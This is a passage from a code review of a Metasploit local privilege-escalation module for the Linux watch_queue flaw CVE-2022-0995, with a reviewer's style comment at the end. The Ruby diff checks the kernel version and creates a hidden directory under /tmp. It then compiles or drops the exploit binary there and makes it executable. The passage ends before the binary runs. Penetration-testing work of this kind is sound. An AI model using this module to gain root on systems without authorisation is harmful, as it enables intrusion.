modules/exploits/linux/local/cve_2022_0995_watch_queue.rb

```diff
@@ -0,0 +1,147 @@
+          [ 'Automatic', {} ],
+        ]
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def pull_version
+    release = kernel_release
+    version_array = release.split('-')
+    if version_array.length < 2
+      fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!')
+    end
+    vprint_status("Version array: #{version_array}")
+    major_version = Rex::Version.new(version_array[0])
+    vprint_status("major_version: #{major_version}")
+    minor_version = version_array[1]
+    vprint_status("minor_version: #{minor_version}")
+    return [major_version, minor_version]
+  end
+
+  def module_check
+    # Vulnerable versions are under 5.17:rc8
+    # This module only has offsets for 5.17.0-37
+    arch = kernel_hardware
+    unless arch.include?('x86_64')
+      fail_with(Failure::NoTarget, "Unsupported architecture: '#{arch}'")
+    end
+    major_version, minor_version = pull_version
+    vulnerable_version = Rex::Version.new('5.13.0')
+    unless major_version == vulnerable_version && minor_version == '37'
+      fail_with(Failure::NoTarget, "No offsets for '#{kernel_release}'")
+    end
+  end
+
+  def check
+    # Vulnerable versions are under 5.17:rc8
+    # This module only has offsets for 5.17.0-37
+    vulnerable_version = Rex::Version.new('5.17.0')
+    major_version = pull_version[0]
+    if major_version <= vulnerable_version
+      return CheckCode::Appears
+    else
+      return CheckCode::Appears("The target kernel version #{major_version} does not match the vulnerable version #{vulnerable_version}")
+    end
+  end
+
+  def exploit
+    module_check
+    if is_root? && !datastore['ForceExploit']
+      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')
+    end
+    base_dir = datastore['WritableDir'].to_s
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    exploit_path = "#{exploit_dir}/#{executable_name}"
+    if file_exist?(exploit_dir)
+      fail_with(Failure::BadConfig, 'Exploit dir already exists')
+    end
+    mkdir(exploit_dir)
+    register_dir_for_cleanup(exploit_dir)
+
+    # Upload exploit
+    if live_compile?
+      vprint_status('Live compiling exploit on system...')
+      code = exploit_source('cve-2022-0995', 'cve-2022-0995.c')
+      upload_and_compile(exploit_path, code, '-no-pie -static')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      precompiled_binary = 'cve-2022-0995.x64.elf'
+      vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")
+      upload_and_chmodx exploit_path, exploit_data('cve-2022-0995', precompiled_binary)
```

Comment:
```suggestion
      upload_and_chmodx(exploit_path, exploit_data('cve-2022-0995', precompiled_binary))
```
Keep styling consistent